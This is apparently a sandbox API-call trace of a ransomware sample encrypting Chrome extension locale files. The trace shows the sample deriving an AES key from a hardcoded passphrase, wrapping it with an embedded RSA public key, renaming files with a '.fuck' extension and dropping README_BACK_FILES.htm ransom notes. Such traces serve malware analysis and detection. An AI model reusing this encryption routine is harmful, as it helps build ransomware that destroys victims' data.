(lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\tr\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\tr\\messages.json")) returned 0x20 [0249.585] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\tr\\messages.json", dwFileAttributes=0x80) returned 1 [0249.585] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\tr\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\tr\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0249.585] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\tr\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\tr\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d58 [0249.586] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\tr\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0249.587] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x293d3d0) returned 1 [0249.589] CryptCreateHash (in: hProv=0x293d3d0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0249.589] lstrlenA (lpString="jXUsvFjvtnzONPctpfadKqUJzMlQm") returned 29 [0249.589] CryptHashData (hHash=0x2938978, pbData=0x28cb2d8, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0249.589] CryptDeriveKey (in: hProv=0x293d3d0, Algid=0x6610, hBaseData=0x2938978, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2937738) returned 1 [0249.589] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----j", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0249.589] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0249.589] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x29400f8) returned 1 [0249.590] CryptImportPublicKeyInfo (in: hCryptProv=0x29400f8, dwCertEncodingType=0x1, pInfo=0x2932e10*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2932e40*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2932e48*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2937e38) returned 1 [0249.590] CryptEncrypt (in: hKey=0x2937e38, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0249.590] CryptEncrypt (in: hKey=0x2937e38, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x293f5d0*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x293f5d0*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0249.590] WriteFile (in: hFile=0x5d58, lpBuffer=0x293f5d0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x293f5d0*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0249.591] ReadFile (in: hFile=0x5d5c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9bc5c*=0xe3, lpOverlapped=0x0) returned 1 [0249.592] CryptEncrypt (in: hKey=0x2937738, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xe3, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xf0) returned 1 [0249.592] WriteFile (in: hFile=0x5d58, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0xf0, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9bc5c*=0xf0, lpOverlapped=0x0) returned 1 [0249.593] CloseHandle (hObject=0x5d5c) returned 1 [0249.593] CloseHandle (hObject=0x5d58) returned 1 [0249.593] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\tr\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\tr\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\tr\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\tr\\messages.json"), bFailIfExists=0) returned 1 [0249.596] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\tr\\messages.json", dwFileAttributes=0x0) returned 1 [0249.597] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\tr\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\tr\\messages.json.gsg")) returned 1 [0249.598] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\tr\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\tr\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\tr\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\tr\\messages.json.fuck")) returned 1 [0249.599] CryptDestroyHash (hHash=0x2938978) returned 1 [0249.599] CryptDestroyKey (hKey=0x2937738) returned 1 [0249.599] CryptReleaseContext (hProv=0x293d3d0, dwFlags=0x0) returned 1 [0249.599] FindNextFileA (in: hFindFile=0x29387f8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0249.599] FindClose (in: hFindFile=0x29387f8 | out: hFindFile=0x29387f8) returned 1 [0249.599] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\tr\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\tr\\readme_back_files.htm")) returned 0xffffffff [0249.599] AreFileApisANSI () returned 1 [0249.599] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e4570, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 153 [0249.600] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\tr\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\tr\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d54 [0249.601] GetFileType (hFile=0x5d54) returned 0x1 [0249.601] WriteFile (in: hFile=0x5d54, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0249.602] FindNextFileA (in: hFindFile=0x29385b8, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0249.602] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\uk\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x29387f8 [0249.602] FindNextFileA (in: hFindFile=0x29387f8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0249.602] FindNextFileA (in: hFindFile=0x29387f8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0249.602] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0249.602] GetLastError () returned 0x0 [0249.602] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\uk\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\uk\\messages.json")) returned 0x20 [0249.602] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\uk\\messages.json", dwFileAttributes=0x80) returned 1 [0249.603] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\uk\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\uk\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d58 [0249.603] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\uk\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\uk\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0249.604] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\uk\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0249.604] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x293d3d0) returned 1 [0249.607] CryptCreateHash (in: hProv=0x293d3d0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0249.607] lstrlenA (lpString="jXUsvFjvtnzONPctpfadKqUJzMlQm") returned 29 [0249.607] CryptHashData (hHash=0x2938978, pbData=0x28cb5d0, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0249.607] CryptDeriveKey (in: hProv=0x293d3d0, Algid=0x6610, hBaseData=0x2938978, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2937738) returned 1 [0249.607] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----j", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0249.607] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0249.607] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x293f3b0) returned 1 [0249.607] CryptImportPublicKeyInfo (in: hCryptProv=0x293f3b0, dwCertEncodingType=0x1, pInfo=0x2933150*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2933180*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2933188*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2938238) returned 1 [0249.607] CryptEncrypt (in: hKey=0x2938238, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0249.608] CryptEncrypt (in: hKey=0x2938238, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x293f658*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x293f658*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0249.608] WriteFile (in: hFile=0x5d5c, lpBuffer=0x293f658*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x293f658*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0249.609] ReadFile (in: hFile=0x5d58, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9bc5c*=0x108, lpOverlapped=0x0) returned 1 [0249.610] CryptEncrypt (in: hKey=0x2937738, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0x108, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0x110) returned 1 [0249.610] WriteFile (in: hFile=0x5d5c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x110, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9bc5c*=0x110, lpOverlapped=0x0) returned 1 [0249.610] CloseHandle (hObject=0x5d58) returned 1 [0249.610] CloseHandle (hObject=0x5d5c) returned 1 [0249.610] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\uk\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\uk\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\uk\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\uk\\messages.json"), bFailIfExists=0) returned 1 [0249.613] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\uk\\messages.json", dwFileAttributes=0x0) returned 1 [0249.614] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\uk\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\uk\\messages.json.gsg")) returned 1 [0249.615] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\uk\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\uk\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\uk\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\uk\\messages.json.fuck")) returned 1 [0249.617] CryptDestroyHash (hHash=0x2938978) returned 1 [0249.617] CryptDestroyKey (hKey=0x2937738) returned 1 [0249.617] CryptReleaseContext (hProv=0x293d3d0, dwFlags=0x0) returned 1 [0249.617] FindNextFileA (in: hFindFile=0x29387f8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0249.617] FindClose (in: hFindFile=0x29387f8 | out: hFindFile=0x29387f8) returned 1 [0249.617] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\uk\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\uk\\readme_back_files.htm")) returned 0xffffffff [0249.617] AreFileApisANSI () returned 1 [0249.617] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e3850, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 153 [0249.618] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\uk\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\uk\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d54 [0249.619] GetFileType (hFile=0x5d54) returned 0x1 [0249.619] WriteFile (in: hFile=0x5d54, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0249.620] FindNextFileA (in: hFindFile=0x29385b8, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0249.620] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\vi\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x29387f8 [0249.621] FindNextFileA (in: hFindFile=0x29387f8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0249.621] FindNextFileA (in: hFindFile=0x29387f8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0249.621] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0249.621] GetLastError () returned 0x0 [0249.621] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\vi\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\vi\\messages.json")) returned 0x20 [0249.621] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\vi\\messages.json", dwFileAttributes=0x80) returned 1 [0249.622] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\vi\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\vi\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0249.622] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\vi\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\vi\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d58 [0249.626] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\vi\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0249.627] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x293d3d0) returned 1 [0249.629] CryptCreateHash (in: hProv=0x293d3d0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0249.629] lstrlenA (lpString="jXUsvFjvtnzONPctpfadKqUJzMlQm") returned 29 [0249.629] CryptHashData (hHash=0x2938978, pbData=0x28cb620, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0249.629] CryptDeriveKey (in: hProv=0x293d3d0, Algid=0x6610, hBaseData=0x2938978, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2937738) returned 1 [0249.629] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----j", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0249.629] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0249.629] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x293f6e0) returned 1 [0249.630] CryptImportPublicKeyInfo (in: hCryptProv=0x293f6e0, dwCertEncodingType=0x1, pInfo=0x29332f0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2933320*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2933328*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x29381b8) returned 1 [0249.630] CryptEncrypt (in: hKey=0x29381b8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, 